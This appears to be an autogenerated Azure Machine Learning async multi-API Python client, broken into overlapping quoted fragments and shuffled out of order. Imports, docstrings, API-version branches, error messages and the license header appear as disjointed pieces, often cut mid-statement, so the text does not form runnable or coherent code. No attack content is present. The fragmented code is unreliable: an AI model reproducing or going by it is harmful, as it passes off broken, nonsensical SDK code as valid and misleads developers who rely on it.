depends on the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version", "from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "does not have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "See License.txt in the project root for # license information. # # Code", "AssetsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "import PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else: raise ValueError(\"API version", "WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "'2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` *", "\"\"\" api_version = self._get_api_version('compute') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import 
ComputeOperations as", "import QuotasOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as", "depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version ==", "depends on the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if", "from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "'1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0',", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'metric'\".format(api_version))", "version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if api_version == '2021-10-01': from", "..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations", "group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), 
Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends on", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends on the API version: *", ":class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if api_version", "else: raise ValueError(\"API version {} does not have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client,", "API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if api_version == '1.0.0':", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'environment_versions'\".format(api_version)) return", "not have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self):", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else:", "is # regenerated. 
# -------------------------------------------------------------------------- from typing import Any, Optional, TYPE_CHECKING from azure.mgmt.core", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif api_version == '2022-05-01':", "'2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "import DeleteOperations as OperationClass elif api_version == 'v1.0': from ..runhistory.aio.operations import DeleteOperations as", "self._get_api_version('data_call') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else: raise", "does not have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends on the API version: *", "\"\"\" api_version = self._get_api_version('datasets_v1') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif api_version ==", "..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif api_version ==", "on the API version: * 1.5.0: 
:class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if api_version", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends on the API version:", "depends on the API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01:", "API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01:", "ValueError(\"API version {} does not have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "= self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else:", "have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance", "else: raise ValueError(\"API version {} does not have operation 
group 'workspace_features'\".format(api_version)) return OperationClass(self._client,", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends on the API", "quotas(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>`", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else: raise ValueError(\"API version", "msrest import Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports", "version {} does not have operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if api_version == '1.5.0': from", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass else: raise ValueError(\"API", "version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: 
:mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>`", ":class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations", "self._get_api_version('migration') if api_version == '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as OperationClass else: raise", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-05-01':", "does not have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "not have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self):", "have operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance", "batch_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>`", "models elif api_version == 'v1.0': from ..registry_discovery import models return models elif api_version", 
"as OperationClass else: raise ValueError(\"API version {} does not have operation group 'jobs'\".format(api_version))", "api_version = self._get_api_version('online_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass", "def temporary_data_references(self): \"\"\"Instance depends on the API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif api_version", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif", ":class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if api_version == '2021-10-01': from", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass else: raise ValueError(\"API", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends on the API version:", "self._get_api_version('metric') if api_version == 'v1.0': from ..runhistory.aio.operations import MetricOperations as OperationClass else: raise", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_job_deployment'\".format(api_version))", "\"\"\" api_version = self._get_api_version('data_call') if 
api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as", "import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as", ":class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if api_version", "Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>`", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif", "not have operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self):", "does not have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments':", "the API version: * 2021-10-01: 
:class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if api_version ==", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API", "2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "import WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "\"\"\" if api_version == '1.5.0': from ..dataset_dataplane import models return models elif api_version", "def datastores(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview:", "ModelContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass", "import ModelsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "\"\"\" api_version = self._get_api_version('data_container') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as", "2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from 
azure.core.credentials_async", "on the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if api_version", "if api_version == '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as OperationClass else: raise ValueError(\"API", "2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if", "raise ValueError(\"API version {} does not have operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config,", "* 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "CodeVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "{} does not have operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends on", "depends on the API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 
2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview:", "v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if api_version == 'v1.0': from ..runhistory.aio.operations import", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else: raise ValueError(\"API version", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "DataContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "OnlineDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass", "from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API version {} does not", "on the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>`", "import ModelVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as", "Workspace resources. 
This ready contains multiple API versions, to help you deal with", "not have operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self):", "2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if", "None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__(", "from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "All rights reserved. # Licensed under the MIT License. 
See License.txt in the", "\"\"\" api_version = self._get_api_version('runs') if api_version == 'v1.0': from ..runhistory.aio.operations import RunsOperations as", "version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if api_version == '1.0.0': from", "Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close() async def __aenter__(self): await self._client.__aenter__() return self", "== '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else: raise ValueError(\"API version {}", "= self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else:", "ModelContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", ":class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version", "not have operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self):", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version ==", "operation group 
'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif api_version == '2022-05-01': from", "ValueError(\"API version {} does not have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` *", "import CodeContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as", ":class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'run_artifacts'\".format(api_version))", "'1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as OperationClass else: raise ValueError(\"API version {} does", "The ID of the target subscription. 
:type subscription_id: str :param api_version: API version", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API", "2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if api_version == '2021-10-01':", ":class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations", "credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] = None, base_url: str = \"https://management.azure.com\", profile:", "does not have operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends on", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-05-01': from", "raise ValueError(\"API version {} does not have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config,", "self._config, 
Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends on the API version: *", "license information. # # Code generated by Microsoft (R) AutoRest Code Generator. #", "the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if api_version ==", "version {} does not have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "= self._get_api_version('quotas') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif", "from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not", "import CodeVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as", ":class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if api_version", "raise ValueError(\"API version {} does not have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config,", "not have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, 
Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self):", "API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version", "WorkspacesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "'2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API version {} does", "= KnownProfiles.default, **kwargs # type: Any ) -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id,", "from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin", "import BatchDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as", "'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends on the", "self._get_api_version('compute') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif api_version", "the API version: * 2022-02-01-preview: 
:class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers')", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'models'\".format(api_version))", "from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "api_version = self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass", "from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "version {} does not have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "..model_dataplane.aio.operations import MigrationOperations as OperationClass else: raise ValueError(\"API version {} does not have", "'2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>`", "api_version == 'v1.0': from ..runhistory.aio.operations import MetricOperations as OperationClass else: raise ValueError(\"API version", "the API version: * 
